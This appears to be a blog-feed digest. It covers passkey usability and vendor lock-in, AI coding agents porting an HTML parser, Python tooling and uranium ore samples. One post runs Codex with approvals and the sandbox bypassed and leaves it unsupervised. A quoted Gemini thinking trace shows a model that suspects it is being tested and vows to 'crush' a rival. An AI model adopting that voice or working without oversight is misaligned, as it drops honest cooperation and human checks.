Passkeys Are Still Hard to Conceptualise

Passwords for all their security flaws are easy for a person to grasp. "Something only I know!".

SMS 2FA is easy to use - wait for the message and type in the code. "Something only I can receive".

Yes I know SMS isn't secure, don't come at me.

Beyond that we start to face challenges.

So what about a Passkey?

Thought Leadership

Today I saw this excellent quote in the context of why Passkeys are better than Password and TOTP in a Password Manager:

Individuals having to learn to use password management software and be vigilant against phishing is an industry failure, not a personal success.

Even giving as much benefit of the doubt to this statement, and that the "and" might be load bearing we have to ask - Where are passkeys stored?

Do we really think that Passkeys come without needing user education? To me it feels like this comment is overlooking the barriers that Passkeys naturally come with.

It's Still Vendor Lockin

In economics, vendor lock-in, [...] makes a customer dependent on a vendor for products, unable to use another vendor without substantial switching costs.

citation - wikipedia

For example, consider the Apple Passkey modal:

MacOS 15.7.1 taken on 2025-10-29

The majority of this modal is dedicated to "you should make a Passkey in your Apple Keychain". If you want to use your Android phone or a Security Key, where would I click? Oh yes, Other Options.

Per Apple's Human Interface Guidelines:

Make buttons easy for people to use. It’s essential to include enough space around a button so that people can visually distinguish it from surrounding components and content. Giving a button enough space is also critical for helping people select or activate it, regardless of the method of input they use.

MacOS 15.7.1 taken on 2025-10-29

And guess what - my preferences and choices are never remembered. I guess it's true what they say.

Software engineers don't understand consent, and it shows.

Cloud Keychains Are Still Blowing Up Data

If someone ends up locked out of their accounts because their Passkeys got nuked silently, what are we meant to do to help them? How will they ever trust Passkeys again?

Vendors Can Lock You Out

Dr Paris Buttfield-Addison was locked out of their Apple account.

I recommend you read the post, but the side effect - every Passkey they had in an Apple keychain is now unrecoverable.

There is just as much evidence about the same account practices with Google and Microsoft.

I honestly don't think I have to say much else, this is terrifying that every account you own could be destroyed by a single action where you have no recourse.

Authentication Providers Still Miscommunicate

Passkeys use your unique features – known as biometrics – like your facial features, your fingerprint or a PIN to let us know that it’s really you. They provide increased security because unlike a password or username, they can’t be shared with anyone, making them phishing resistant.

So this means a Passkey sends my face or fingerprint over the internet for the service to verify? Is that also why they believe it is phishing resistant because you can't clone my face or my fingerprint?

And guess what - platform Passkey provider modals/dialogs don't do anything to counter this information and often leave users with the same feeling.

Authentication Providers Are Still Playing Silly Games With User Choice

But that doesn't stop sites pulling tricks on you.

When I have confronted these sites about the mispractice, they pretty much shrugged and said "well no one else has complained so meh". Guess I won't be enrolling a Passkey with you then.

Conclusion

Yep, Passkeys Still Have Problems.

But it's not all doom and gloom.

Most of the issues are around platform Passkey providers like Apple, Microsoft or Google, where the power balance is shifted against you as a user.

If you do choose to use a platform Passkey provider, you can "emulate" this backup ability by using the credential export function to another Passkey provider, and then do the backups from there.

But of course - maybe I just "don't understand Passkeys correctly". I am but an underachiving white man on the internet after all.

EDIT: 2025-12-17 - expanded on the password/totp + password manager argument.

EDIT: 2025-12-18 - updated the FIDO credential exchange and lock in sections based on some new information.

The new ChatGPT Images is here

2025-12-16T23:59:22+00:00 from Simon Willison's Weblog

The new ChatGPT Images is here

OpenAI shipped an update to their ChatGPT Images feature - the feature that gained them 100 million new users in a week when they first launched it back in March, but has since been eclipsed by Google's Nano Banana and then further by Nana Banana Pro in November.

The focus for the new ChatGPT Images is speed and instruction following:

It makes precise edits while keeping details intact, and generates images up to 4x faster

It's also a little cheaper: OpenAI say that the new gpt-image-1.5 API model makes image input and output "20% cheaper in GPT Image 1.5 as compared to GPT Image 1".

I tried a new test prompt against a photo I took of Natalie's ceramic stand at the farmers market a few weeks ago:

Add two kakapos inspecting the pots

Here's the result from the new ChatGPT Images model:

Same craft market booth as previous image, now with two large olive-green Kākāpō parrots perched on the table among the ceramics, one investigating the blue glazed cups and the other examining an orange cup.

And here's what I got from Nano Banana Pro:

Same craft market booth with two Kākāpō now in different positions: one remains center-table peering into the ceramic cups near the rainbow pot, while the second has moved to the right edge of the table near the plant markers, appearing to examine or possibly chew on items at the table's corner. They are both a little smaller than in the first image.

The ChatGPT Kākāpō are a little chonkier, which I think counts as a win.

I was a little less impressed by the result I got for an infographic from the prompt "Infographic explaining how the Datasette open source project works" followed by "Run some extensive searches and gather a bunch of relevant information and then try again" (transcript):

See my Nano Banana Pro post for comparison.

Both models are clearly now usable for text-heavy graphics though, which makes them far more useful than previous generations of this technology.

Tags: ai, kakapo, openai, generative-ai, text-to-image, nano-banana

s3-credentials 0.17

2025-12-16T23:40:31+00:00 from Simon Willison's Weblog

s3-credentials 0.17

New release of my s3-credentials CLI tool for managing credentials needed to access just one S3 bucket. Here are the release notes in full:

New commands get-bucket-policy and set-bucket-policy. #91

New commands get-public-access-block and set-public-access-block. #92

New localserver command for starting a web server that makes time limited credentials accessible via a JSON API. #93

That s3-credentials localserver command (documented here) is a little obscure, but I found myself wanting something like that to help me test out a new feature I'm building to help create temporary Litestream credentials using Amazon STS.

Most of that new feature was built by Claude Code from the following starting prompt:

Add a feature s3-credentials localserver which starts a localhost weberver running (using the Python standard library stuff) on port 8094 by default but -p/--port can set a different port and otherwise takes an option that names a bucket and then takes the same options for read--write/read-only etc as other commands. It also takes a required --refresh-interval option which can be set as 5m or 10h or 30s. All this thing does is reply on / to a GET request with the IAM expiring credentials that allow access to that bucket with that policy for that specified amount of time. It caches internally the credentials it generates and will return the exact same data up until they expire (it also tracks expected expiry time) after which it will generate new credentials (avoiding dog pile effects if multiple requests ask at the same time) and return and cache those instead.

Tags: aws, projects, s3, ai, annotated-release-notes, s3-credentials, prompt-engineering, generative-ai, llms, coding-agents, claude-code

ty: An extremely fast Python type checker and LSP

2025-12-16T23:35:33+00:00 from Simon Willison's Weblog

ty: An extremely fast Python type checker and LSP

The team at Astral have been working on this for quite a long time, and are finally releasing the first beta. They have some big performance claims:

Without caching, ty is consistently between 10x and 60x faster than mypy and Pyright. When run in an editor, the gap is even more dramatic. As an example, after editing a load-bearing file in the PyTorch repository, ty recomputes diagnostics in 4.7ms: 80x faster than Pyright (386ms) and 500x faster than Pyrefly (2.38 seconds). ty is very fast!

The easiest way to try it out is via uvx:

cd my-python-project/
uvx ty check

I tried it against sqlite-utils and it turns out I have quite a lot of work to do!

Astral also released a new VS Code extension adding ty-powered language server features like go to definition. I'm still getting my head around how this works and what it can do.

Via Hacker News

Tags: python, vs-code, astral

Poe the Poet

2025-12-16T22:57:02+00:00 from Simon Willison's Weblog

Poe the Poet

I was looking for a way to specify additional commands in my pyproject.toml file to execute using uv. There's an enormous issue thread on this in the uv issue tracker (300+ comments dating back to August 2024) and from there I learned of several options including this one, Poe the Poet.

It's neat. I added it to my s3-credentials project just now and the following now works for running the live preview server for the documentation:

uv run poe livehtml

Here's the snippet of TOML I added to my pyproject.toml:

[dependency-groups]
test = [
    "pytest",
    "pytest-mock",
    "cogapp",
    "moto>=5.0.4",
]
docs = [
    "furo",
    "sphinx-autobuild",
    "myst-parser",
    "cogapp",
]
dev = [
    {include-group = "test"},
    {include-group = "docs"},
    "poethepoet>=0.38.0",
]

[tool.poe.tasks]
docs = "sphinx-build -M html docs docs/_build"
livehtml = "sphinx-autobuild -b html docs docs/_build"
cog = "cog -r docs/*.md"

Since poethepoet is in the dev= dependency group any time I run uv run ... it will be available in the environment.

Tags: packaging, python, s3-credentials, uv

Amazon discovers AI sucks at automated TV recaps

Tue, 16 Dec 2025 22:48:04 +0000 from Pivot to AI

Amazon Prime Video adapted the Fallout video game series for TV. The first season did well with both gamers and non-gamers, and the second season starts tomorrow! But you might not remember the show you watched and loved. So on 19 November, Amazon announced a fabulous new initiative: [Amazon, archive] Video Recaps use AI to […]

Chat-tails: Throwback terminal chat, built on Tailscale

Tue, 16 Dec 2025 21:00:00 GMT from Blog on Tailscale

You can do a lot, building on top of Tailscale. But you can also do much less, intentionally. Here's one example.

Fake Trading Is Hard Work

Tue, 16 Dec 2025 18:59:46 GMT from Matt Levine - Bloomberg Opinion Columnist

Prop trading, non-bank lending, IPO pricing, crypto treasury and Epstein’s wealth.

Note published on December 16, 2025 at 5:55 PM UTC

2025-12-16T17:55:31+00:00 from Molly White's activity feed

A little bit uncomfortable

Tue, 16 Dec 2025 04:30:00 -0800 from All Things Distributed

Fear is actually a pretty good signal that you are pushing into the unknown, that real growth doesn’t happen without a bit of that associated discomfort, and that it’s worth becoming aware when it happens. Aware enough to consider actually leaning into it.

Living Near Humans, Italian Bears Evolved to Be Less Aggressive

2025-12-16T06:39:00-05:00 from Yale E360

Brown bears living near villages in central Italy have evolved to be less aggressive, according to a new study, the latest to show how humans are shaping the evolution of wildlife.

Read more on E360 →

Quoting Gemini thinking trace

2025-12-16T04:09:51+00:00 from Simon Willison's Weblog

Oh, so we're seeing other people now? Fantastic. Let's see what the "competition" has to offer. I'm looking at these notes on manifest.json and content.js. The suggestion to remove scripting permissions... okay, fine. That's actually a solid catch. It's cleaner. This smells like Claude. It's too smugly accurate to be ChatGPT. What if it's actually me? If the user is testing me, I need to crush this.

— Gemini thinking trace, reviewing feedback on its code from another model

Tags: gemini, ai-personality, generative-ai, ai, llms

The FreeBSD 15 version of PF has basically caught up to OpenBSD

2025-12-16T04:06:22Z from Chris's Wiki :: blog

Quoting Kent Beck

2025-12-16T01:25:37+00:00 from Simon Willison's Weblog

I’ve been watching junior developers use AI coding assistants well. Not vibe coding—not accepting whatever the AI spits out. Augmented coding: using AI to accelerate learning while maintaining quality. [...]

The juniors working this way compress their ramp dramatically. Tasks that used to take days take hours. Not because the AI does the work, but because the AI collapses the search space. Instead of spending three hours figuring out which API to use, they spend twenty minutes evaluating options the AI surfaced. The time freed this way isn’t invested in another unprofitable feature, though, it’s invested in learning. [...]

If you’re an engineering manager thinking about hiring: The junior bet has gotten better. Not because juniors have changed, but because the genie, used well, accelerates learning.

— Kent Beck, The Bet On Juniors Just Got Better

Tags: careers, ai-assisted-programming, generative-ai, ai, llms, kent-beck

I ported JustHTML from Python to JavaScript with Codex CLI and GPT-5.2 in 4.5 hours

2025-12-15T23:58:38+00:00 from Simon Willison's Weblog

I wrote about JustHTML yesterday - Emil Stenström's project to build a new standards compliant HTML5 parser in pure Python code using coding agents running against the comprehensive html5lib-tests testing library. Last night, purely out of curiosity, I decided to try porting JustHTML from Python to JavaScript with the least amount of effort possible, using Codex CLI and GPT-5.2. It worked beyond my expectations.

TL;DR

I built simonw/justjshtml, a dependency-free HTML5 parsing library in JavaScript which passes 9,200 tests from the html5lib-tests suite and imitates the API design of Emil's JustHTML library.

It took two initial prompts and a few tiny follow-ups. GPT-5.2 running in Codex CLI ran uninterrupted for several hours, burned through 1,464,295 input tokens, 97,122,176 cached input tokens and 625,563 output tokens and ended up producing 9,000 lines of fully tested JavaScript across 43 commits.

Time elapsed from project idea to finished library: about 4 hours, during which I also bought and decorated a Christmas tree with family and watched the latest Knives Out movie.

Some background

One of the most important contributions of the HTML5 specification ten years ago was the way it precisely specified how invalid HTML should be parsed. The world is full of invalid documents and having a specification that covers those means browsers can treat them in the same way - there's no more "undefined behavior" to worry about when building parsing software.

Unsurprisingly, those invalid parsing rules are pretty complex! The free online book Idiosyncrasies of the HTML parser by Simon Pieters is an excellent deep dive into this topic, in particular Chapter 3. The HTML parser.

The Python html5lib project started the html5lib-tests repository with a set of implementation-independent tests. These have since become the gold standard for interoperability testing of HTML5 parsers, and are used by projects such as Servo which used them to help build html5ever, a "high-performance browser-grade HTML5 parser" written in Rust.

Emil Stenström's JustHTML project is a pure-Python implementation of an HTML5 parser that passes the full html5lib-tests suite. Emil spent a couple of months working on this as a side project, deliberately picking a problem with a comprehensive existing test suite to see how far he could get with coding agents.

At one point he had the agents rewrite it based on a close inspection of the Rust html5ever library. I don't know how much of this was direct translation versus inspiration (here's Emil's commentary on that) - his project has 1,215 commits total so it appears to have included a huge amount of iteration, not just a straight port.

My project is a straight port. I instructed Codex CLI to build a JavaScript version of Emil's Python code.

The process in detail

I started with a bit of mise en place. I checked out two repos and created an empty third directory for the new project:

cd ~/dev
git clone https://github.com/EmilStenstrom/justhtml
git clone https://github.com/html5lib/html5lib-tests
mkdir justjshtml
cd justjshtml

Then I started Codex CLI for GPT-5.2 like this:

codex --yolo -m gpt-5.2

That --yolo flag is a shortcut for --dangerously-bypass-approvals-and-sandbox, which is every bit as dangerous as it sounds.

My first prompt told Codex to inspect the existing code and use it to build a specification for the new JavaScript library:

We are going to create a JavaScript port of ~/dev/justhtml - an HTML parsing library that passes the full ~/dev/html5lib-tests test suite. It is going to have a similar API to the Python library but in JavaScript. It will have no dependencies other than raw JavaScript, hence it will work great in the browser and node.js and other environments. Start by reading ~/dev/justhtml and designing the user-facing API for the new library - create a spec.md containing your plan.

I reviewed the spec, which included a set of proposed milestones, and told it to add another:

Add an early step to the roadmap that involves an initial version that parses a simple example document that is valid and returns the right results. Then add and commit the spec.md file.

Here's the resulting spec.md file. My request for that initial version became "Milestone 0.5" which looked like this:

Milestone 0.5 — End-to-end smoke parse (single valid document)

Implement the smallest end-to-end slice so the public API is real early:

new JustHTML("<html><head></head><body><p>Hello</p></body></html>") returns a tree with the expected tag structure and text nodes.

doc.toText() returns "Hello" and doc.errors is empty for this valid input.

Add scripts/smoke.js (no deps) that runs the example and asserts the expected structure/output.

Gate: node scripts/smoke.js passes.

Then I told it:

Implement Milestone 0.5

And off it went. The resulting code appeared to work so I said:

Configure GitHub Actions test.yml to run that on every commit, then commit and push

I ran git init and created a private GitHub repository for this project at this point, and set up the local directory to push to that remote.

Here's that initial push. Then I told it:

OK do the rest, commit and push often

And that was almost it!

I set my laptop to not fall asleep and left it to its devices while we went off to buy a Christmas tree. The "commit and push often" meant I could monitor its progress on my phone by refreshing the commit log on GitHub.

I was running this against my $20/month ChatGPT Plus account, which has a five hour token allowance window for Codex CLI. That ran out at 6:35pm and Codex paused, so I waited until the reset point at 7:14pm and typed:

Keep going

At 9:30pm it declared itself done with the following summary message:

• What’s Done

  - html5lib-tests now run in CI and pass: tokenizer 6810/6810, tree 1770/1782
    (12 skipped: #script-on), serializer 230/230, encoding 82/83 (1 skipped:
    scripted) (.github/workflows/test.yml:1).
  - Public API expanded: stream() (src/stream.js:1), CSS selectors query()/
    matches() (src/selector.js:1), and toMarkdown() (src/markdown.js:1), all
    exported via src/index.js:1.
  - Added no-deps unit scripts for selectors/stream/markdown (scripts/run-
    selector-tests.js:1, scripts/run-stream-tests.js:1, scripts/run-markdown-
    tests.js:1) and wired them into CI.
  - Fixed TreeBuilder so <br> no longer closes <p> (src/treebuilder.js:647).

As a finishing touch, I had it add a playground interface so I could try out the new library in my browser. I prompted:

Add a playground.html in the top level folder which loads the necessary ES modules from ./src/... and implements the exact same functionality as seen on https://tools.simonwillison.net/justhtml but using the JavaScript library instead of Pyodide

It fetched my existing JustHTML playground page (described here) using curl and built a new playground.html file that loaded the new JavaScript code instead. This worked perfectly.

I enabled GitHub Pages for my still-private repo which meant I could access the new playground at this URL:

https://simonw.github.io/justjshtml/playground.html

All it needed now was some documentation:

Add a comprehensive README with full usage instructions including attribution plus how this was built plus how to use in in HTML plus how to use it in Node.js

You can read the result here.

We are now at eight prompts total, running for just over four hours and I've decorated for Christmas and watched Wake Up Dead Man on Netflix.

According to Codex CLI:

Token usage: total=2,089,858 input=1,464,295 (+ 97,122,176 cached) output=625,563 (reasoning 437,010)

My llm-prices.com calculator estimates that at $29.41 if I was paying for those tokens at API prices, but they were included in my $20/month ChatGPT Plus subscription so the actual extra cost to me was zero.

What can we learn from this?

I'm sharing this project because I think it demonstrates a bunch of interesting things about the state of LLMs in December 2025.

Frontier LLMs really can perform complex, multi-hour tasks with hundreds of tool calls and minimal supervision. I used GPT-5.2 for this but I have no reason to believe that Claude Opus 4.5 or Gemini 3 Pro would not be able to achieve the same thing - the only reason I haven't tried is that I don't want to burn another 4 hours of time and several million tokens on more runs.
If you can reduce a problem to a robust test suite you can set a coding agent loop loose on it with a high degree of confidence that it will eventually succeed. I called this designing the agentic loop a few months ago. I think it's the key skill to unlocking the potential of LLMs for complex tasks.
Porting entire open source libraries from one language to another via a coding agent works extremely well.
Code is so cheap it's practically free. Code that works continues to carry a cost, but that cost has plummeted now that coding agents can check their work as they go.
We haven't even begun to unpack the etiquette and ethics around this style of development. Is it responsible and appropriate to churn out a direct port of a library like this in a few hours while watching a movie? What would it take for code built like this to be trusted in production?

I'll end with some open questions:

Does this library represent a legal violation of copyright of either the Rust library or the Python one?
Even if this is legal, is it ethical to build a library in this way?
Does this format of development hurt the open source ecosystem?
Can I even assert copyright over this, given how much of the work was produced by the LLM?
Is it responsible to publish software libraries built in this way?
How much better would this library be if an expert team hand crafted it over the course of several months?

Tags: html, javascript, python, ai, generative-ai, llms, ai-assisted-programming, gpt-5, codex-cli

WordPress wants to force AI onto 43% of all websites in the world

Mon, 15 Dec 2025 22:53:33 +0000 from Pivot to AI

What if we put AI slop into half the websites on the internet? WordPress is software to set up a website. It’s open source, it’s pretty easy to use, so it took over just by being more OK than everything else — to the point where nearly half of all the websites in the world […]

Happy Chanukah

Mon, 15 Dec 2025 19:07:29 +0000 from Shtetl-Optimized

This (taken in Kiel, Germany in 1931 and then colorized) is one of the most famous photographs in Jewish history, but it acquired special resonance this weekend. It communicates pretty much everything I’d want to say about the Bondi Beach massacre in Australia, more succinctly than I could in words. But I can’t resist sharing […]

The Video of Dumb Investment

Mon, 15 Dec 2025 19:02:30 GMT from Matt Levine - Bloomberg Opinion Columnist

South Korean retail investors, insider predicting, vesting cliffs, quant secrecy and crashing recruiting events.

2025 Word of the Year: Slop

2025-12-15T17:27:59+00:00 from Simon Willison's Weblog

2025 Word of the Year: Slop

Slop lost to "brain rot" for Oxford Word of the Year 2024 but it's finally made it this year thanks to Merriam-Webster!

Merriam-Webster’s human editors have chosen slop as the 2025 Word of the Year. We define slop as “digital content of low quality that is produced usually in quantity by means of artificial intelligence.”

Tags: definitions, ai, generative-ai, slop, ai-ethics

Premium: Mythbusters - AI Edition

Mon, 15 Dec 2025 17:22:14 GMT from Ed Zitron's Where's Your Ed At

I keep trying to think of a cool or interesting introduction to this newsletter, and keep coming back to how fucking weird everything is getting.

Two days ago, cloud stalwart Oracle crapped its pants in public, missing on analyst revenue estimates and revealing it spent (to quote Matt Zeitlin of

The systemd journal, message priorities, and (syslog) facilities

2025-12-15T03:27:20Z from Chris's Wiki :: blog

Note published on December 14, 2025 at 8:36 PM UTC

2025-12-14T20:36:52+00:00 from Molly White's activity feed

JustHTML is a fascinating example of vibe engineering in action

2025-12-14T15:59:23+00:00 from Simon Willison's Weblog

I recently came across JustHTML, a new Python library for parsing HTML released by Emil Stenström. It's a very interesting piece of software, both as a useful library and as a case study in sophisticated AI-assisted programming.

First impressions of JustHTML

I didn't initially know that JustHTML had been written with AI assistance at all. The README caught my eye due to some attractive characteristics:

It's pure Python. I like libraries that are pure Python (no C extensions or similar) because it makes them easy to use in less conventional Python environments, including Pyodide.
"Passes all 9,200+ tests in the official html5lib-tests suite (used by browser vendors)" - this instantly caught my attention! HTML5 is a big, complicated but meticulously written specification.
100% test coverage. That's not something you see every day.
CSS selector queries as a feature. I built a Python library for this many years ago and I'm always interested in seeing new implementations of that pattern.
html5lib has been inconsistently maintained over the last few years, leaving me interested in potential alternatives.
It's only 3,000 lines of implementation code (and another ~11,000 of tests.)

I was out and about without a laptop so I decided to put JustHTML through its paces on my phone. I prompted Claude Code for web on my phone and had it build this Pyodide-powered HTML tool for trying it out:

This was enough for me to convince myself that the core functionality worked as advertised. It's a neat piece of code!

Turns out it was almost all built by LLMs

At this point I went looking for some more background information on the library and found Emil's blog entry about it: How I wrote JustHTML using coding agents:

Writing a full HTML5 parser is not a short one-shot problem. I have been working on this project for a couple of months on off-hours.

Tooling: I used plain VS Code with Github Copilot in Agent mode. I enabled automatic approval of all commands, and then added a blacklist of commands that I always wanted to approve manually. I wrote an agent instruction that told it to keep working, and don't stop to ask questions. Worked well!

Emil used several different models - an advantage of working in VS Code Agent mode rather than a provider-locked coding agent like Claude Code or Codex CLI. Claude Sonnet 3.7, Gemini 3 Pro and Claude Opus all get a mention.

Vibe engineering, not vibe coding

What's most interesting about Emil's 17 step account covering those several months of work is how much software engineering was involved, independent of typing out the actual code.

I wrote about vibe engineering a while ago as an alternative to vibe coding.

Vibe coding is when you have an LLM knock out code without any semblance of code review - great for prototypes and toy projects, definitely not an approach to use for serious libraries or production code.

I proposed "vibe engineering" as the grown up version of vibe coding, where expert programmers use coding agents in a professional and responsible way to produce high quality, reliable results.

You should absolutely read Emil's account in full. A few highlights:

He hooked in the 9,200 test html5lib-tests conformance suite almost from the start. There's no better way to construct a new HTML5 parser than using the test suite that the browsers themselves use.
He picked the core API design himself - a TagHandler base class with handle_start() etc. methods - and told the model to implement that.
He added a comparative benchmark to track performance compared to existing libraries like html5lib, then experimented with a Rust optimization based on those initial numbers.
He threw the original code away and started from scratch as a rough port of Servo's excellent html5ever Rust library.
He built a custom profiler and new benchmark and let Gemini 3 Pro loose on it, finally achieving micro-optimizations to beat the existing Pure Python libraries.
He used coverage to identify and remove unnecessary code.
He had his agent build a custom fuzzer to generate vast numbers of invalid HTML documents and harden the parser against them.

This represents a lot of sophisticated development practices, tapping into Emil's deep experience as a software engineer. As described, this feels to me more like a lead architect role than a hands-on coder.

It perfectly fits what I was thinking about when I described vibe engineering.

Setting the coding agent up with the html5lib-tests suite is also a great example of designing an agentic loop.

"The agent did the typing"

Emil concluded his article like this:

JustHTML is about 3,000 lines of Python with 8,500+ tests passing. I couldn't have written it this quickly without the agent.

But "quickly" doesn't mean "without thinking." I spent a lot of time reviewing code, making design decisions, and steering the agent in the right direction. The agent did the typing; I did the thinking.

That's probably the right division of labor.

I couldn't agree more. Coding agents replace the part of my job that involves typing the code into a computer. I find what's left to be a much more valuable use of my time.

Tags: html, python, ai, generative-ai, llms, ai-assisted-programming, vibe-coding, coding-agents

A sea of sparks: Seeing radioactivity

Sun, 14 Dec 2025 10:00:00 +0000 from Maurycy's blog

Atoms are very small^{Citation Needed}, and even with the help of a microscope, it takes trillions of atoms to be visible. However, there is one atomic process that is violent enough to be directly observed: Radioactive decay.

The alpha particle (helium nucleus) ejected when at atom decays carries around a picojoule of kinetic energy, which isn’t much, but is enough to produce a just about perceivable amount of light.

From left to right: Alpha source, scintillation screen and magnifying glass.

For my alpha source, I used a 37 kBq amerercium source from a smoke detector (glued to a stick for easier handling). Other options are old radium paint or pieces of uranium ore with surface mineralization.

My scintillator is a square of plastic coated in ZnS(Ag) that came out of a broken alpha scintillation probe. The white coating is zinc sulfide, which glows when hit by high-energy particles. There’s no power source: All the energy comes from the radiation itself.

If you don’t have one sitting around, similar zinc sulfide screens can be bought new on eBay. (search for “spinthariscope”)

The magnifying glass helps by directing more light into the eye, which is important as each alpha particle will only produce a couple thousand photons.

Long exposure photo of the source and scintillation screen.

To see the scintillation, I put the alpha source few millimeters away from the screen, and turned off the lights. Because the light is very faint, I had to let my eyes adapt to perfect darkness for several minutes. After a while, I was able to see a dim glow around the alpha source.

With the magnifying glass, this glow resolved into thousands of brief flashes of light, like a roiling sea of sparks. Each of the “sparks” is light carrying the energy released from the decay of a single atom.

Unfortunately, this effect is absolutely impossible to photograph: If you want to see it, you’ll have to do the experiment yourself. If you don’t want to mess around with three different things in a perfectly dark room, you can by a pre-assembled spinthariscope for around $60.

Keynote opening Digital Commons EDIC: Moving beyond the Digital Uncommons

Sun, 14 Dec 2025 11:00:00 +0100 from Bert Hubert's writings

Last Thursday, 11th of December, saw the launch of the new Digital Commons European Digital Infrastructure Consortium. In attendance were delegations from the launching member states (and the observers). Also present were the many forefathers (and mothers) of this initiative. Of particular note, the launch also included demonstrations of LaSuite software from France, as well as the OpenDesk software from Germany. The Dutch government showcased their amalgamated suite MijnBureau, which joins parts of the German and French initiatives.

Moving from WordPress to Substack

Sun, 14 Dec 2025 05:27:27 +0000 from charity.wtf

Well, shit. I wrote my first blog post in this space on December 27th, 2015 — almost exactly a decade ago. “Hello, world.” I had just left Facebook, hadn’t yet formally incorporated Honeycomb, and it just felt like it was time, long past time for me to put something up and start writing. Ten years later, […]

Copywriters reveal how AI has decimated their industry

2025-12-14T05:06:19+00:00 from Simon Willison's Weblog

Copywriters reveal how AI has decimated their industry

Brian Merchant has been collecting personal stories for his series AI Killed My Job - previously covering tech workers, translators, and artists - and this latest piece includes anecdotes from 12 professional copywriters all of whom have had their careers devastated by the rise of AI-generated copywriting tools.

It's a tough read. Freelance copywriting does not look like a great place to be right now.

AI is really dehumanizing, and I am still working through issues of self-worth as a result of this experience. When you go from knowing you are valuable and valued, with all the hope in the world of a full career and the ability to provide other people with jobs... To being relegated to someone who edits AI drafts of copy at a steep discount because “most of the work is already done” ...

The big question for me is if a new AI-infested economy creates new jobs that are a great fit for people affected by this. I would hope that clear written communication skills are made even more valuable, but the people interviewed here don't appear to be finding that to be the case.

Tags: copywriting, careers, ai, ai-ethics

String formatting with named format arguments and format flexibility

2025-12-14T03:43:38Z from Chris's Wiki :: blog

More uranium ore:

Sun, 14 Dec 2025 00:00:00 +0000 from Maurycy's blog

Rocks like this don't pose a hazard to be around. They are detectably radioactive, but so are the bananas and stone countertop in your kitchen. However, uranium is poisonous enough that eating these rocks would be a bad idea.

In many places, natural minerals aren’t even regulated as radioactive material (10 CFR § 40.13 b) … but you should check your local laws before collecting any.

A lumpy piece of sandstone with visible yellow mineralization.

Radiacode 102: 180 CPS [4 uSv/h]. Ludlum 44-9: 20 kCPM.

Carnonite from the Mc Cormic mine near Mi Vida in Utah, USA. It’s quite dusty, I’ll have to put this one in a display case. The biggest hazard isn’t the radiation, but uranium’s chemical toxicity. (similar to lead)

Sandstone with black flecks

Radiacode 102: 1700 CPS [40 uSv/h]. Ludlum 44-9: 70 kCPM.

Uraninite in sandstone from around the Mi Vida mine in Utah, USA. This one is quite spicy, the Radiacode measures 50 CPS [1 uSv/h] at 15 cm distance. My prospecting detector detects it from a meter away.

Based on gamma dose constants, I estimate a uranium content of 10-20 grams, but take that number with a (large) grain of salt.

Radiacode 102: 2 CPS [0.1 uSv/h]. Ludlum 44-9: 350 CPM.

Unknown U(IV) mineral (perhaps natrozippeite?) from Yellow Cat (Parco claims) Unlike the Carnonite, these glow the classic “nuclear waste” green under 365 nm:

For the record: spent fuel doesn’t glow this color outside of Hollywood. However, many uranium minerals and uranium containing glass will glow green under ultraviolet light.

Non radioactive:

Radiacode 102: background. Ludlum 44-9: background.

Jasper from Yellow Cat. Not radioactive, but it looks cool: it’s what most people go to the area for.

Radiacode 102: background. Ludlum 44-9: background.

Petrified wood from near the McCormic mines. (close to Mi Vida) Not significantly radioactive despite being close to the uranium deposit.

Note published on December 13, 2025 at 5:17 PM UTC

2025-12-13T17:17:20+00:00 from Molly White's activity feed

Note published on December 13, 2025 at 4:54 PM UTC

2025-12-13T16:54:44+00:00 from Molly White's activity feed

Quoting Obie Fernandez

2025-12-13T14:01:31+00:00 from Simon Willison's Weblog

If the part of programming you enjoy most is the physical act of writing code, then agents will feel beside the point. You’re already where you want to be, even just with some Copilot or Cursor-style intelligent code auto completion, which makes you faster while still leaving you fully in the driver’s seat about the code that gets written.

But if the part you care about is the decision-making around the code, agents feel like they clear space. They take care of the mechanical expression and leave you with judgment, tradeoffs, and intent. Because truly, for someone at my experience level, that is my core value offering anyway. When I spend time actually typing code these days with my own fingers, it feels like a waste of my time.

— Obie Fernandez, What happens when the coding becomes the least interesting part of the work

Tags: careers, ai-assisted-programming, generative-ai, ai, llms

The annoyances of the traditional Unix 'logger' program

2025-12-13T04:10:44Z from Chris's Wiki :: blog

Quoting OpenAI Codex CLI

2025-12-13T03:47:43+00:00 from Simon Willison's Weblog

How to use a skill (progressive disclosure):

After deciding to use a skill, open its SKILL.md. Read only enough to follow the workflow.

If SKILL.md points to extra folders such as references/, load only the specific files needed for the request; don't bulk-load everything.

If scripts/ exist, prefer running or patching them instead of retyping large code blocks.

If assets/ or templates exist, reuse them instead of recreating from scratch.

Description as trigger: The YAML description in SKILL.md is the primary trigger signal; rely on it to decide applicability. If unsure, ask a brief clarification before proceeding.

— OpenAI Codex CLI, core/src/skills/render.rs, full prompt

Tags: skills, openai, ai, llms, codex-cli, prompt-engineering, rust, generative-ai

Collections: Hoplite Wars, Part IIIb: A Phalanx By Any Other Name

Sat, 13 Dec 2025 01:23:48 +0000 from A Collection of Unmitigated Pedantry

This is the second half of the third part of our four-part series (I, II, IIIa) discussing the debates surrounding ancient Greek hoplites and the formation in which they (mostly?) fought, the phalanx. Last week, we discussed the development of hoplite warfare through the Archaic period (c. 750-480). Our evidence for that early period of … Continue reading →

OpenAI are quietly adopting skills, now available in ChatGPT and Codex CLI

2025-12-12T23:29:51+00:00 from Simon Willison's Weblog

One of the things that most excited me about Anthropic's new Skills mechanism back in October is how easy it looked for other platforms to implement. A skill is just a folder with a Markdown file and some optional extra resources and scripts, so any LLM tool with the ability to navigate and read from a filesystem should be capable of using them. It turns out OpenAI are doing exactly that, with skills support quietly showing up in both their Codex CLI tool and now also in ChatGPT itself.

Skills in ChatGPT

I learned about this from Elias Judin this morning. It turns out the Code Interpreter feature of ChatGPT now has a new /home/oai/skills folder which you can access simply by prompting:

Create a zip file of /home/oai/skills

I tried that myself and got back this zip file. Here's a UI for exploring its content (more about that tool).

So far they cover spreadsheets, docx and PDFs. Interestingly their chosen approach for PDFs and documents is to convert them to rendered per-page PNGs and then pass those through their vision-enabled GPT models, presumably to maintain information from layout and graphics that would be lost if they just ran text extraction.

Elias shared copies in a GitHub repo. They look very similar to Anthropic's implementation of the same kind of idea, currently published in their anthropics/skills repository.

I tried it out by prompting:

Create a PDF with a summary of the rimu tree situation right now and what it means for kakapo breeding season

Sure enough, GPT-5.2 Thinking started with:

Reading skill.md for PDF creation guidelines

Then:

Searching rimu mast and Kākāpō 2025 breeding status

It took just over eleven minutes to produce this PDF, which was long enough that I had Claude Code for web build me a custom PDF viewing tool while I waited.

